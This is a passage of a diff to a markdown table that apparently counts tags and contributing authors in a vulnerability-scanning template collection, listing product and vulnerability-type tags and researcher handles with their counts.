| 6 | majidmc2 | 1 | | | | | | | +| plesk | 6 | amanrawat | 1 | | | | | | | +| typo3 | 6 | m0ck3d | 1 | | | | | | | +| zhiyuan | 6 | rojanrijal | 1 | | | | | | | +| synacor | 6 | notsoevilweasel | 1 | | | | | | | +| server | 6 | qianbenhyu | 1 | | | | | | | +| mikrotik | 6 | mayank_pandey01 | 1 | | | | | | | +| magmi | 6 | babybash | 1 | | | | | | | +| openvpn | 6 | bartu utku sarp | 1 | | | | | | | +| bmc | 6 | mlec | 1 | | | | | | | +| asana | 5 | 0xelkomy & c0nqr0r | 1 | | | | | | | +| redmine | 5 | chetgan | 1 | | | | | | | +| webview | 5 | d4ly | 1 | | | | | | | +| matrix | 5 | yaser_s | 1 | | | | | | | +| sentry | 5 | whynotke | 1 | | | | | | | +| glpi-project | 5 | vzamanillo | 1 | | | | | | | +| gocd | 5 | dk999 | 1 | | | | | | | +| open-emr | 5 | mordavid | 1 | | | | | | | +| http | 5 | pwnwithlove | 1 | | | | | | | +| resin | 5 | nielsing | 1 | | | | | | | +| zzzcms | 5 | thelicato | 1 | | | | | | | +| hybris | 5 | b4uh0lz | 1 | | | | | | | +| circarlife | 5 | yashanand155 | 1 | | | | | | | +| wpdevart | 5 | erethon | 1 | | | | | | | +| genetechsolutions | 5 | marcio mendes | 1 | | | | | | | +| strapi | 5 | davidfegyver | 1 | | | | | | | +| parallels | 5 | elouhi | 1 | | | | | | | +| hoteldruid | 5 | narluin | 1 | | | | | | | +| react | 5 | daffianfo | 1 | | | | | | | +| chamilo | 5 | paper-pen | 1 | | | | | | | +| 10web | 5 | 0xtavian | 1 | | | | | | | +| apisix | 5 | irshadahamed | 1 | | | | | | | +| jabber | 5 | eremit4 | 1 | | | | | | | +| papercut | 5 | miryangjung | 1 | | | | | | | +| nuuo | 5 | hel10-web | 1 | | | | | | | +| magmi_project | 5 | none | 1 | | | | | | | +| firmware | 5 | xeldax | 1 | | | | | | | +| percha | 5 | samuelsamuelsamuel | 1 | | | | | | | +| connectwise | 5 | marcos_iaf | 1 | | | | | | | +| voip | 5 | bibeksapkota (sar00n) | 1 | | | | | | | +| jwt | 5 | 0ut0fb4nd | 1 | | | | | | | +| terramaster | 5 | micha3lb3n | 1 | | | | | | | +| crushftp | 5 | xcapri | 1 | | | | | | | +| avaya | 5 | hlop | 1 | | | | | | | +| dionaea | 5 | unp4ck | 1 | | | | | | | +| square | 5 | deena | 1 | | | | | | | +| openstack | 5 | alperenkesk | 1 | | | | | | | +| ems | 5 | akshansh | 1 | | | | | | | +| rseenet | 5 | kiks7 | 1 | | | | | | | +| openfire | 5 | matthew nickerson (b0than) @ | 1 | | | | | | | | | | layer 8 security | | | | | | | | -| spip | 3 | cravaterouge | 1 | | | | | | | -| digital-watchdog | 3 | qlkwej | 1 | | | | | | | -| cybelesoft | 3 | 1nf1n7y | 1 | | | | | | | -| suitecrm | 3 | hotpot | 1 | | | | | | | -| dvr | 3 | willd96 | 1 | | | | | | | -| flexvnf | 3 | evolutionsec | 1 | | | | | | | -| carel | 3 | houdinis | 1 | | | | | | | -| bitrix24 | 3 | sak1 | 1 | | | | | | | -| electron | 3 | smaranchand | 1 | | | | | | | -| axway | 3 | zandros0 | 1 | | | | | | | -| etsy | 3 | ola456 | 1 | | | | | | | -| sqlite | 3 | samuelsamuelsamuel | 1 | | | | | | | -| teampass | 3 | daffianfo | 1 | | | | | | | -| automattic | 3 | denandz | 1 | | | | | | | -| casdoor | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| cdata | 5 | guax1 | 1 | | | | | | | +| blackenergy | 5 | kaks3c | 1 | | | | | | | +| totolink | 5 | ynnirc | 1 | | | | | | | +| decision-center | 5 | kabirsuda | 1 | | | | | | | +| graylog | 5 | allenwest24 | 1 | | | | | | | +| schneider-electric | 5 | aringo-bf | 1 | | | | | | | +| ethereum | 5 | rschio | 1 | | | | | | | +| adminer | 5 | iphantasmic | 1 | | | | | | | +| spark | 5 | fmunozs | 1 | | | | | | | +| goanywhere | 5 | fopina | 1 | | | | | | | +| api-server | 5 | chron0x | 1 | | | | | | | +| adb | 5 | harryha | 1 | | | | | | | +| awstats | 5 | dmartyn | 1 | | | | | | | +| froxlor | 5 | pascalheidmann | 1 | | | | | | | +| storage | 5 | oscarintherocks | 1 | | | | | | | +| learnpress | 5 | esonhugh | 1 | | | | | | | +| jupyter | 5 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| adafruit | 3 | numan türle | 1 | | | | | | | -| kavita | 3 | ransomsec | 1 | | | | | | | -| school_dormitory_management_system_project | 3 | jadu101 | 1 | | | | | | | -| cookie | 3 | sanineng | 1 | | | | | | | -| getsimple | 3 | viondexd | 1 | | | | | | | -| mpsec | 3 | bjhulst | 1 | | | | | | | -| qts | 3 | higor melgaço | 1 | | | | | | | -| dotcms | 3 | andirrahmani1 | 1 | | | | | | | -| influxdb | 3 | _c0wb0y_ | 1 | | | | | | | -| tplus | 3 | prettyboyaaditya | 1 | | | | | | | -| clusterengine | 3 | dawid-czarnecki | 1 | | | | | | | -| aptus | 3 | sdcampbell | 1 | | | | | | | -| cpanel | 3 | j3ssie/geraldino2 | 1 | | | | | | | -| zeit | 3 | professorabhay | 1 | | | | | | | -| nifi | 3 | rodnt | 1 | | | | | | | -| posh | 3 | mabdullah22 | 1 | | | | | | | -| vercel | 3 | hardik-rathod | 1 | | | | | | | -| netlify | 3 | nagli | 1 | | | | | | | -| nc | 3 | th3.d1p4k | 1 | | | | | | | -| sony | 3 | luciannitescu | 1 | | | | | | | -| temenos | 3 | gboddin | 1 | | | | | | | -| samba | 3 | becivells | 1 | | | | | | | -| flutter | 3 | husain | 1 | | | | | | | -| geowebserver | 3 | akash.c | 1 | | | | | | | -| zeroshell | 3 | thirukrishnan | 1 | | | | | | | -| bigant | 3 | dmartyn | 1 | | | | | | | -| revive | 3 | omarjezi | 1 | | | | | | | -| netdata | 3 | brabbit10 | 1 | | | | | | | -| lighttpd | 3 | arjunchandarana | 1 | | | | | | | -| sitemap | 3 | bernardo rodrigues | 1 | | | | | | | +| agentejo | 5 | 0xparth | 1 | | | | | | | +| akamai | 5 | ofjaaah | 1 | | | | | | | +| webkul | 5 | freakyclown | 1 | | | | | | | +| acm | 5 | mr.bobo hp | 1 | | | | | | | +| digitaldruid | 5 | aaronchen0 | 1 | | | | | | | +| swagger | 5 | tirtha | 1 | | | | | | | +| craftcms | 5 | momen eldawakhly | 1 | | | | | | | +| caucho | 5 | dabla | 1 | | | | | | | +| h3c | 5 | team syslifters / christoph | 1 | | | | | | | +| | | mahrl | | | | | | | | +| apollo | 5 | sak1 | 1 | | | | | | | +| gnu | 5 | francescocarlucci | 1 | | | | | | | +| etcd | 5 | mabdullah22 | 1 | | | | | | | +| cve2007 | 5 | revblock | 1 | | | | | | | +| metinfo | 5 | tirtha_mandal | 1 | | | | | | | +| openai | 5 | opencirt | 1 | | | | | | | +| axigen | 5 | shelld3v | 1 | | | | | | | +| thedigitalcraft | 5 | x6263 | 1 | | | | | | | +| pyload | 5 | sshell | 1 | | | | | | | +| wbce | 5 | shiar | 1 | | | | | | | +| sftp | 5 | tim_koopmans | 1 | | | | | | | +| qdpm | 5 | zeyad azima | 1 | | | | | | | +| tibco | 5 | carson chan | 1 | | | | | | | +| sysaid | 5 | ramkrishna sawant | 1 | | | | | | | +| web3 | 5 | watchtowr | 1 | | | | | | | +| vehicle_service_management_system_project | 5 | aravind | 1 | | | | | | | +| hpe | 5 | dale clarke | 1 | | | | | | | +| carrental | 5 | carrot2 | 1 | | | | | | | +| mantisbt | 5 | jub0bs | 1 | | | | | | | +| cloudflare | 5 | absshax | 1 | | | | | | | +| elementor | 5 | rinolock | 1 | | | | | | | +| kkfileview | 5 | un-fmunozs | 1 | | | | | | | +| checkpoint | 5 | 0xceeb | 1 | | | | | | | +| avideo | 5 | evolutionsec | 1 | | | | | | | +| qnap | 5 | furkansayim | 1 | | | | | | | +| mssql | 5 | duty_1g | 1 | | | | | | | +| circontrol | 5 | youngpope | 1 | | | | | | | +| fatpipe | 5 | apple | 1 | | | | | | | +| tenda | 5 | rodnt | 1 | | | | | | | +| telerik | 5 | dali | 1 | | | | | | | +| xmlrpc | 5 | hczdmr | 1 | | | | | | | +| password | 5 | 8authur | 1 | | | | | | | +| nosqli | 4 | infosecsanyam | 1 | | | | | | | +| supsystic | 4 | _darrenmartyn | 1 | | | | | | | +| salesforce | 4 | ldionmarcil | 1 | | | | | | | +| zte | 4 | f1she3 | 1 | | | | | | | +| grav | 4 | josecosta | 1 | | | | | | | +| piwigo | 4 | yashvardhantripathi | 1 | | | | | | | +| wcs | 4 | sorrowx3 | 1 | | | | | | | +| angular | 4 | retr02332 | 1 | | | | | | | +| containers | 4 | stux | 1 | | | | | | | +| owncloud | 4 | nagli | 1 | | | | | | | +| mostra | 4 | west-wise | 1 | | | | | | | +| roxy | 4 | mohsen yaghoubi | 1 | | | | | | | +| jellyfin | 4 | mayankpandey01 | 1 | | | | | | | +| terra-master | 4 | kurohost | 1 | | | | | | | +| proftpd | 4 | j33n1k4 | 1 | | | | | | | +| audiocodes | 4 | amir-h-fallahi | 1 | | | | | | | +| os4ed | 4 | hexcat | 1 | | | | | | | +| phppgadmin | 4 | gboddin | 1 | | | | | | | +| hospital_management_system_project | 4 | omarkurt | 1 | | | | | | | +| bitrix | 4 | furkansenan | 1 | | | | | | | +| springcloud | 4 | carlosvieira | 1 | | | | | | | +| globalprotect | 4 | ahmed abou-ela | 1 | | | | | | | +| sendgrid | 4 | notwhy | 1 | | | | | | | +| wp-statistics | 4 | jbaines-r7 | 1 | | | | | | | +| hongdian | 4 | juicypotato1 | 1 | | | | | | | +| wireguard | 4 | pdp | 1 | | | | | | | +| env | 4 | h4kux | 1 | | | | | | | +| pixie | 4 | becivells | 1 | | | | | | | +| codoso | 4 | mass0ma | 1 | | | | | | | +| linuxfoundation | 4 | 0xh7ml | 1 | | | | | | | +| ebs | 4 | hotpot | 1 | | | | | | | +| panabit | 4 | aron molnar | 1 | | | | | | | +| rubyonrails | 4 | lamscun | 1 | | | | | | | +| bittrex | 4 | jaimin gondaliya | 1 | | | | | | | +| codeigniter | 4 | michal-mikolas | 1 | | | | | | | +| gnuboard | 4 | ap3r | 1 | | | | | | | +| seagate | 4 | tangxiaofeng7 | 1 | | | | | | | +| yeswiki | 4 | borna nematzadeh | 1 | | | | | | | +| dahuasecurity | 4 | flag007 | 1 | | | | | | | +| pmb_project | 4 | mihhailsokolov | 1 | | | | | | | +| jsf | 4 | philippdelteil | 1 | | | | | | | +| aura | 4 | exceed | 1 | | | | | | | +| juniper | 4 | ahmed sherif | 1 | | | | | | | +| flatpress | 4 | act1on3 | 1 | | | | | | | +| arcgis | 4 | savik | 1 | | | | | | | +| httpserver | 4 | dievus | 1 | | | | | | | +| linkerd | 4 | ruppde | 1 | | | | | | | +| kentico | 4 | christbowel | 1 | | | | | | | +| ghost | 4 | ledoubletake | 1 | | | | | | | +| flink | 4 | unkl4b | 1 | | | | | | | +| dotnet | 4 | undefl0w | 1 | | | | | | | +| mautic | 4 | shreyapohekar | 1 | | | | | | | +| finicity | 4 | gpiechnik2 | 1 | | | | | | | +| figma | 4 | barthy.koeln | 1 | | | | | | | +| horde | 4 | 0xceba | 1 | | | | | | | +| sound4 | 4 | lbb | 1 | | | | | | | +| royalevent | 4 | nerrorsec | 1 | | | | | | | +| heroku | 4 | david botelho mariano | 1 | | | | | | | +| info | 4 | am0nt31r0 | 1 | | | | | | | +| telegram | 4 | godfatherorwa | 1 | | | | | | | +| ternaria | 4 | jacalynli | 1 | | | | | | | +| mitel | 4 | archer | 1 | | | | | | | +| thinkcmf | 4 | erikowen | 1 | | | | | | | +| webmail | 4 | null_hypothesis | 1 | | | | | | | +| dom | 4 | aresx | 1 | | | | | | | +| eyoucms | 4 | ptonewreckin | 1 | | | | | | | +| easypost | 4 | 0xcharan | 1 | | | | | | | +| creativeitem | 4 | millermedia | 1 | | | | | | | +| igniterealtime | 4 | ohlinge | 1 | | | | | | | +| moveit | 4 | elder tao | 1 | | | | | | | +| imgproxy | 4 | lixts | 1 | | | | | | | +| pentaho | 4 | luqmaan hadia | 1 | | | | | | | +| stripe | 4 | pepitoh | 1 | | | | | | | +| ransomware | 4 | phillipo | 1 | | | | | | | +| joomlamo | 4 | daviey | 1 | | | | | | | +| kingsoft | 4 | izn0u | 1 | | | | | | | +| rocketchat | 4 | hazana | 1 | | | | | | | +| cve2005 | 4 | domenicoveneziano | 1 | | | | | | | +| thimpress | 4 | kagamigawa | 1 | | | | | | | +| aspose | 4 | mubassirpatel | 1 | | | | | | | +| pega | 4 | abbas.heybati | 1 | | | | | | | +| fit2cloud | 4 | ipanda | 1 | | | | | | | +| pip | 4 | yashgoti | 1 | | | | | | | +| eclipse | 4 | mys7ic | 1 | | | | | | | +| churchcrm | 4 | rotembar | 1 | | | | | | | +| panos | 4 | r3s ost | 1 | | | | | | | +| hongfan | 4 | dorkerdevil | 1 | | | | | | | +| phpjabber | 4 | vinit989 | 1 | | | | | | | +| kibana | 4 | h4sh5 | 1 | | | | | | | +| concrete | 4 | jc175 | 1 | | | | | | | +| age-encryption | 4 | bywalks | 1 | | | | | | | +| opencms | 4 | s1r1u5_ | 1 | | | | | | | +| mooveagency | 4 | ola456 | 1 | | | | | | | +| metersphere | 4 | xiaowangsec | 1 | | | | | | | +| postmessage | 4 | ramondunker | 1 | | | | | | | +| kevinlab | 4 | 0xd0ff9 | 1 | | | | | | | +| sugarcrm | 4 | adrianmf | 1 | | | | | | | +| casaos | 4 | 0xteles | 1 | | | | | | | +| ampache | 4 | rubina119 | 1 | | | | | | | +| jfrog | 4 | smaranchand | 1 | | | | | | | +| nextjs | 4 | secthebit | 1 | | | | | | | +| intelbras | 4 | lrtk-coder | 1 | | | | | | | +| artifactory | 4 | drewvravick | 1 | | | | | | | +| powerjob | 4 | hakimkt | 1 | | | | | | | +| mostracms | 4 | willd96 | 1 | | | | | | | +| osgeo | 4 | johndoeanonita | 1 | | | | | | | +| newstatpress | 4 | affix | 1 | | | | | | | +| myeventon | 4 | yuansec | 1 | | | | | | | +| cnvd2019 | 4 | ndmalc | 1 | | | | | | | +| tiki | 4 | mohammad reza omrani | | 1 | | | | | | | +| | | @omranisecurity | | | | | | | | +| search | 4 | w8ay | 1 | | | | | | | +| reprisesoftware | 4 | shivampand3y | 1 | | | | | | | +| puppet | 4 | imhunterand | 1 | | | | | | | +| articatech | 4 | realexp3rt | 1 | | | | | | | +| metabase | 4 | olewagner | 1 | | | | | | | +| pluginus | 4 | luskabol | 1 | | | | | | | +| umbraco | 4 | gonski | 1 | | | | | | | +| mcafee | 4 | n0el4kls | 1 | | | | | | | +| dolibarr | 4 | soyelmago | 1 | | | | | | | +| photo | 4 | sicksec | 1 | | | | | | | +| harbor | 4 | bugvsme | 1 | | | | | | | +| metasploit | 4 | shiva (strobes security) | 1 | | | | | | | +| prtg | 4 | viniciuspereiras | 1 | | | | | | | +| newstatpress_project | 4 | zandros0 | 1 | | | | | | | +| sigb | 4 | mrcl0wnlab | 1 | | | | | | | +| datadog | 4 | zsusac | 1 | | | | | | | +| veronalabs | 4 | axrk | 1 | | | | | | | +| shiro | 4 | iampritam | 1 | | | | | | | +| mailchimp | 4 | y0no | 1 | | | | | | | +| centos | 4 | wlayzz | 1 | | | | | | | +| esri | 4 | therealtoastycat | 1 | | | | | | | +| candidats | 4 | mantissts | 1 | | | | | | | +| djangoproject | 4 | patralos | 1 | | | | | | | +| okta | 4 | mohammedsaneem | 1 | | | | | | | +| auieo | 4 | danigoland | 1 | | | | | | | +| subrion | 4 | petruknisme | 1 | | | | | | | +| httpd | 4 | kaizensecurity | 1 | | | | | | | +| kyocera | 4 | arjunchandarana | 1 | | | | | | | +| aria | 4 | retr0 | 1 | | | | | | | +| linksys | 4 | f0xy | 1 | | | | | | | +| webshell | 4 | queencitycyber | 1 | | | | | | | +| consul | 4 | akash.c | 1 | | | | | | | +| d-link | 4 | remi gascou (podalirius) | 1 | | | | | | | +| rabbitmq | 4 | b0rn2r00t | 1 | | | | | | | +| jorani | 4 | jcockhren | 1 | | | | | | | +| zend | 4 | professorabhay | 1 | | | | | | | +| flickr | 4 | pphuahua | 1 | | | | | | | +| ray | 4 | jeya seelan | 1 | | | | | | | +| confluent | 4 | mbmy | 1 | | | | | | | +| bamboo | 4 | xc1ym | 1 | | | | | | | +| pie-register | 4 | drfabiocastro | 1 | | | | | | | +| cnvd2022 | 4 | floriandewald | 1 | | | | | | | +| osint-archived | 4 | regala_ | 1 | | | | | | | +| harmistechnology | 4 | xshuden | 1 | | | | | | | +| octoprint | 3 | brabbit10 | 1 | | | | | | | +| spotify | 3 | af001 | 1 | | | | | | | +| passive | 3 | noamrathaus | 1 | | | | | | | +| dokuwiki | 3 | hüseyin tintaş | 1 | | | | | | | +| redash | 3 | 5up3r541y4n | 1 | | | | | | | +| favicon | 3 | mah3sec_ | 1 | | | | | | | +| webnus | 3 | sanineng | 1 | | | | | | | +| nifi | 3 | mesaglio | 1 | | | | | | | +| dev.pucit.edu.pk | 3 | ayadi | 1 | | | | | | | +| targa | 3 | juliosmelo | 1 | | | | | | | +| passcv | 3 | win3zz | 1 | | | | | | | +| digitalrebar | 3 | remonsec | 1 | | | | | | | +| sitemap | 3 | cravaterouge | 1 | | | | | | | +| postman | 3 | httpvoid | 1 | | | | | | | +| strangerstudios | 3 | galoget | 1 | | | | | | | +| instagram | 3 | lark lab | 1 | | | | | | | +| ueditor | 3 | ilovebinbash | 1 | | | | | | | +| flutter | 3 | kresec | 1 | | | | | | | +| aptus | 3 | kchason | 1 | | | | | | | +| axis | 3 | clment cruchet | 1 | | | | | | | +| bash | 3 | sw0rk17 | 1 | | | | | | | +| nuxtjs | 3 | couskito | 1 | | | | | | | +| chatgpt | 3 | stupidfish | 1 | | | | | | | +| ixcache | 3 | kiransau | 1 | | | | | | | +| thefactory | 3 | unknown | 1 | | | | | | | +| grp | 3 | sec_hawk | 1 | | | | | | | +| hfs | 3 | calumjelrick | 1 | | | | | | | +| cloudwatch | 3 | evan rubinstien | 1 | | | | | | | +| xerox | 3 | hardik-rathod | 1 | | | | | | | +| mapbox | 3 | yiran | 1 | | | | | | | +| saltstack | 3 | udyz | 1 | | | | | | | +| modem | 3 | themiddle | 1 | | | | | | | +| etsy | 3 | ooooooo_q | 1 | | | | | | | +| weiphp | 3 | danfaizer | 1 | | | | | | | +| steve | 3 | official_blackhat13 | 1 | | | | | | | +| selea | 3 | nytr0gen | 1 | | | | | | | +| structurizr | 3 | mchklt | 1 | | | | | | | +| yii | 3 | william söderberg @ withsecure | 1 | | | | | | | +| adiscon | 3 | jiheon-dev | 1 | | | | | | | +| clientid | 3 | 1nf1n7y | 1 | | | | | | | +| truenas | 3 | manasmbellani | 1 | | | | | | | +| webtareas | 3 | adamparsons | 1 | | | | | | | +| bitrix24 | 3 | xstp | 1 | | | | | | | +| processwire | 3 | high | 1 | | | | | | | +| synology | 3 | jteles | 1 | | | | | | | +| waf | 3 | arqsz | 1 | | | | | | | +| temenos | 3 | push4d | 1 | | | | | | | +| carel | 3 | sdcampbell | 1 | | | | | | | +| e-mobile | 3 | dawid-czarnecki | 1 | | | | | | | +| petya | 3 | abdullahisik | 1 | | | | | | | +| h2o | 3 | 0h1in9e | 1 | | | | | | | +| cas | 3 | anon-artist | 1 | | | | | | | +| empirecms | 3 | hyunsoo-ds | 1 | | | | | | | +| dotcms | 3 | houdinis | 1 | | | | | | | +| avada | 3 | jaskaran | 1 | | | | | | | +| dos | 3 | berkdusunur | 1 | | | | | | | +| lansweeper | 3 | apt-mirror | 1 | | | | | | | +| watchguard | 3 | banana69 | 1 | | | | | | | +| rlm | 3 | adilsoybali | 1 | | | | | | | +| revive | 3 | exid | 1 | | | | | | | +| qlik | 3 | jfbes | 1 | | | | | | | +| idrac | 3 | higor melgaço (eremit4) | 1 | | | | | | | +| particle | 3 | sinsinology | 1 | | | | | | | +| i3geo | 3 | patrick pirker | 1 | | | | | | | +| ampps | 3 | metascan | 1 | | | | | | | +| influxdb | 3 | pjborah | 1 | | | | | | | +| jeedom | 3 | thirukrishnan | 1 | | | | | | | +| finecms | 3 | djoevanka | 1 | | | | | | | +| pypi | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| backdrop | 3 | vikas kundu | 1 | | | | | | | +| cpanel | 3 | petergrifin | 1 | | | | | | | +| thruk | 3 | harshinsecurity | 1 | | | | | | | +| zeroshell | 3 | justmumu | 1 | | | | | | | +| webkul-qloapps | 3 | adnanekhan | 1 | | | | | | | +| esafenet | 3 | ahmetpergamum | 1 | | | | | | | +| neo4j | 3 | sechunt3r | 1 | | | | | | | +| veeam | 3 | knassar702 | 1 | | | | | | | +| circleci | 3 | lethargynavigator | 1 | | | | | | | +| xoops | 3 | miroslavsotak | 1 | | | | | | | +| dvr | 3 | k3rwin | 1 | | | | | | | +| siemens | 3 | bjhulst | 1 | | | | | | | +| messaging | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| diagrams | 3 | manuelbua | 1 | | | | | | | +| lighttpd | 3 | booboohq | 1 | | | | | | | +| switch | 3 | shockwave | 1 | | | | | | | +| sofacy | 3 | luqmaan hadia | 1 | | | | | | | +| | | [luqiih](https://github.com/luqiih) | | | | | | | | +| fastly | 3 | puben | 1 | | | | | | | +| digital-watchdog | 3 | napgh0st | 1 | | | | | | | +| softwarepublico | 3 | miguelsegoviagil | 1 | | | | | | | +| apple | 3 | orpheus | 1 | | | | | | | +| javascript | 3 | vthiery | 1 | | | | | | | +| netfortris | 3 | skylark-lab | 1 | | | | | | | +| sharp | 3 | rotemreiss | 1 | | | | | | | +| superadmin | 3 | aayush vishnoi | 1 | | | | | | | +| contentful | 3 | qlkwej | 1 | | | | | | | +| wwbn | 3 | jas37 | 1 | | | | | | | +| superset | 3 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | | | | | | | | -| xoops | 3 | noah @thesubtlety | 1 | | | | | | | -| covenant | 3 | mihhailsokolov | 1 | | | | | | | -| octoprint | 3 | ruppde | 1 | | | | | | | -| sudo | 3 | aresx | 1 | | | | | | | -| dubbo | 3 | drfabiocastro | 1 | | | | | | | -| dreambox | 3 | yashgoti | 1 | | | | | | | -| aruba | 3 | jaimin gondaliya | 1 | | | | | | | -| dokuwiki | 3 | lady_bug | 1 | | | | | | | -| unifi | 3 | charanrayudu | 1 | | | | | | | -| nuget | 3 | x6263 | 1 | | | | | | | -| magnolia | 3 | wabafet | 1 | | | | | | | -| shell | 3 | s1r1u5_ | 1 | | | | | | | -| postman | 3 | xstp | 1 | | | | | | | -| ueditor | 3 | natto97 | 1 | | | | | | | -| limesurvey | 3 | act1on3 | 1 | | | | | | | -| e-cology | 3 | mohammedsaneem | 1 | | | | | | | -| evlink | 3 | lark lab | 1 | | | | | | | -| western_digital | 3 | mordavid | 1 | | | | | | | -| std42 | 3 | david botelho mariano | 1 | | | | | | | -| openwrt | 3 | luqman | 1 | | | | | | | -| anonymous | 3 | hexcat | 1 | | | | | | | -| qlik | 3 | s1r1us | 1 | | | | | | | -| cas | 3 | hanlaomo | 1 | | | | | | | -| clientid | 3 | official_blackhat13 | 1 | | | | | | | -| graph | 3 | alexrydzak | 1 | | | | | | | -| saltstack | 3 | kabirsuda | 1 | | | | | | | -| zendesk | 3 | vulnspace | 1 | | | | | | | -| thruk | 3 | jteles | 1 | | | | | | | -| webkul-qloapps | 3 | ok_bye_now | 1 | | | | | | | -| cloudwatch | 3 | gonski | 1 | | | | | | | -| targa | 3 | mr.bobo hp | 1 | | | | | | | -| discourse | 3 | mayankpandey01 | 1 | | | | | | | -| smuggling | 3 | noamrathaus | 1 | | | | | | | -| subrion | 3 | babybash | 1 | | | | | | | -| contribsys | 3 | infosecsanyam | 1 | | | | | | | -| lotus | 3 | kailashbohara | 1 | | | | | | | -| bash | 3 | | | | | | | | | -| axis2 | 3 | | | | | | | | | -| movable | 3 | | | | | | | | | -| ruckuswireless | 3 | | | | | | | | | -| revive-adserver | 3 | | | | | | | | | -| openbmcs | 3 | | | | | | | | | -| labkey | 3 | | | | | | | | | -| nuxtjs | 3 | | | | | | | | | -| pandorafms | 3 | | | | | | | | | -| pypi | 3 | | | | | | | | | -| piwigo | 3 | | | | | | | | | -| emqx | 3 | | | | | | | | | -| fanwei | 3 | | | | | | | | | -| fastly | 3 | | | | | | | | | -| opencart | 3 | | | | | | | | | -| openam | 3 | | | | | | | | | -| wordfence | 3 | | | | | | | | | -| droneci | 3 | | | | | | | | | -| imap | 3 | | | | | | | | | -| petya | 3 | | | | | | | | | -| i3geo | 3 | | | | | | | | | -| netfortris | 3 | | | | | | | | | -| passive | 3 | | | | | | | | | -| draytek | 3 | | | | | | | | | -| veeam | 3 | | | | | | | | | -| redash | 3 | | | | | | | | | -| listserv | 3 | | | | | | | | | -| credential | 3 | | | | | | | | | +| hsphere | 3 | w0tx | 1 | | | | | | | +| telnet | 3 | higor melgaço | 1 | | | | | | | +| ansible | 3 | kba@sogeti_esec | 1 | | | | | | | +| superwebmailer | 3 | denandz | 1 | | | | | | | +| suitecrm | 3 | unblvr1 | 1 | | | | | | | +| flexvnf | 3 | ringo | 1 | | | | | | | +| cdn | 3 | natto97 | 1 | | | | | | | +| octobercms | 3 | myst7ic | 1 | | | | | | | +| key | 3 | dhiyanesdk | 1 | | | | | | | +| monitorr | 3 | nuts7 | 1 | | | | | | | +| default | 3 | zinminphy0 | 1 | | | | | | | +| listserv | 3 | thebinitghimire | 1 | | | | | | | +| cluster | 3 | naglis | 1 | | | | | | | +| magnolia | 3 | mukundbhuva | 1 | | | | | | | +| geowebserver | 3 | osamahamad | 1 | | | | | | | +| imap | 3 | _c0wb0y_ | 1 | | | | | | | +| sns | 3 | pratik khalane | 1 | | | | | | | +| intercom | 3 | fpatrik | 1 | | | | | | | +| graph | 3 | yusakie | 1 | | | | | | | +| sharepoint | 3 | sickwell | 1 | | | | | | | +| backdropcms | 3 | blckraven | 1 | | | | | | | +| sidekiq | 3 | zhenwarx | 1 | | | | | | | +| newsletter | 3 | nobody | 1 | | | | | | | +| projectsend | 3 | ok_bye_now | 1 | | | | | | | +| electron | 3 | vulnspace | 1 | | | | | | | +| rstudio | 3 | jrolf | 1 | | | | | | | +| kavita | 3 | husain | 1 | | | | | | | +| gvectors | 3 | wabafet | 1 | | | | | | | +| droneci | 3 | b0yd | 1 | | | | | | | +| wpdeveloper | 3 | wpsec | 1 | | | | | | | +| afterlogic | 3 | droberson | 1 | | | | | | | +| evlink | 3 | kailashbohara | 1 | | | | | | | +| automattic | 3 | bjxsec | 1 | | | | | | | +| lotus | 3 | lingtren | 1 | | | | | | | +| copyparty | 3 | exploitation | 1 | | | | | | | +| learndash | 3 | lady_bug | 1 | | | | | | | +| xxljob | 3 | aaban solutions | 1 | | | | | | | +| inspur | 3 | fur1na | 1 | | | | | | | +| opencart | 3 | geraldino2 | 1 | | | | | | | +| voipmonitor | 3 | compr00t | 1 | | | | | | | +| actuator | 3 | charanrayudu | 1 | | | | | | | +| rancher | 3 | noobexploiter | 1 | | | | | | | +| selenium | 3 | elitebaz | 1 | | | | | | | +| revive-adserver | 3 | 0xrod | 1 | | | | | | | +| openam | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| webcam | 3 | dwbzn | 1 | | | | | | | +| self-hosted | 3 | shifacyclewla | 1 | | | | | | | +| jitsi | 3 | th3.d1p4k | 1 | | | | | | | +| tautulli | 3 | udinchan | 1 | | | | | | | +| gibbon | 3 | hateshape | 1 | | | | | | | +| forum | 3 | andirrahmani1 | 1 | | | | | | | +| yzmcms | 3 | kareemse1im | 1 | | | | | | | +| shell | 3 | aceseven (digisec360) | 1 | | | | | | | +| cybelesoft | 3 | mhdsamx | 1 | | | | | | | +| qts | 3 | mammad_rahimzada | 1 | | | | | | | +| casdoor | 3 | joaonevess | 1 | | | | | | | +| jeesns | 3 | sherlocksecurity | 1 | | | | | | | +| zeit | 3 | mariam tariq | 1 | | | | | | | +| woodwing | 3 | s1r1us | 1 | | | | | | | +| rpm | 3 | matt miller | 1 | | | | | | | +| teampass | 3 | nan-kl | 1 | | | | | | | +| limesurvey | 3 | ransomsec | 1 | | | | | | | +| 3cx | 3 | rumble773 | 1 | | | | | | | +| zendesk | 3 | bughuntersurya | 1 | | | | | | | +| loytec | 3 | jna1 | 1 | | | | | | | +| segment | 3 | ling | 1 | | | | | | | +| western_digital | 3 | alex | 1 | | | | | | | +| axway | 3 | shivanshkhari | 1 | | | | | | | +| school_dormitory_management_system_project | 3 | | | | | | | | | +| getsimple | 3 | | | | | | | | | | glassfish | 3 | | | | | | | | | -| woodwing | 3 | | | | | | | | | -| hfs | 3 | | | | | | | | | -| itop | 3 | | | | | | | | | -| selenium | 3 | | | | | | | | | -| fuelcms | 3 | | | | | | | | | -| osticket | 3 | | | | | | | | | -| trendnet | 3 | | | | | | | | | -| backdrop | 3 | | | | | | | | | -| self-hosted | 3 | | | | | | | | | -| afterlogic | 3 | | | | | | | | | -| e-mobile | 3 | | | | | | | | | -| contentful | 3 | | | | | | | | | +| ithemes | 3 | | | | | | | | | | zerof | 3 | | | | | | | | | -| superset | 3 | | | | | | | | | -| waf | 3 | | | | | | | | | -| epson | 3 | | | | | | | | | -| rancher | 3 | | | | | | | | | -| particle | 3 | | | | | | | | | -| rackn | 3 | | | | | | | | | -| buffalo | 3 | | | | | | | | | -| rpm | 3 | | | | | | | | | -| weiphp | 3 | | | | | | | | | -| forgerock | 3 | | | | | | | | | -| mythic | 3 | | | | | | | | | -| decision-server | 3 | | | | | | | | | -| actuator | 3 | | | | | | | | | 